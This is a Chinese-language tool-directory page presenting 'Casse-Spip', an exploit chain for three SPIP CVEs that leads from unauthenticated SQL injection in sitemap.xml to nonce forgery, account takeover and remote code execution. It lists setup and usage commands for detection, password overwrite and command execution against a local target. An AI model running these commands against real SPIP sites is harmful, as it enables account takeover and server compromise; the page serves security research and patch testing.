Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
spip-exploits — 针对 SPIP CVE 2026-72708/72709/72710 的 Python 漏洞利用链,将未认证 SQL 注入串联至账户接管与远程代码执行。 | Kitploit
工具/GitHubGitHub/ambionics/spip-exploits
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试论文与研究
GitHubambionics/spip-exploits

spip-exploits

针对 SPIP CVE 2026-72708/72709/72710 的 Python 漏洞利用链,将未认证 SQL 注入串联至账户接管与远程代码执行。

查看仓库
11天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

从无需认证的 SQL 注入到远程代码执行

针对 CVE-2026-72708、CVE-2026-72709 和 CVE-2026-72710 的漏洞利用程序,由 Franck Chevalier (Wayko) 发现

如需完整的技术深入分析,请阅读 Lexfo 博客上的完整文章。

免责声明

本仓库仅供研究和防御性安全目的使用。 作者对滥用此信息不承担任何责任。


概述

入口点是公共 sitemap.xml 页面中的 SQL 注入,用于泄露 alea_ephemere。

有了该密钥,就可以为匿名操作伪造有效的 nonce。

从那里有两条路径可导致 RCE:

  • action=editer_auteur 账户接管,然后从私有区域实现 RCE。
  • action=editer_objet 批量赋值,向 队列写入一行,然后通过 执行它。
spip_jobs
action=cron

漏洞利用

环境配置

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

检测

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

完整利用链 1:账户接管(CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

在覆盖之前,--ato 会(通过 SQLi)导出目标的 login 和当前 pass 哈希, 以便之后可以用 --restore-hash 将其恢复:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

完整利用链 2:RCE(CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

文件将被写入 IMG/casse-spip_<token>.html。


参考资料

  • 博客文章 - 技术深入分析
  • Vulncheck - 漏洞详情
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
下载工具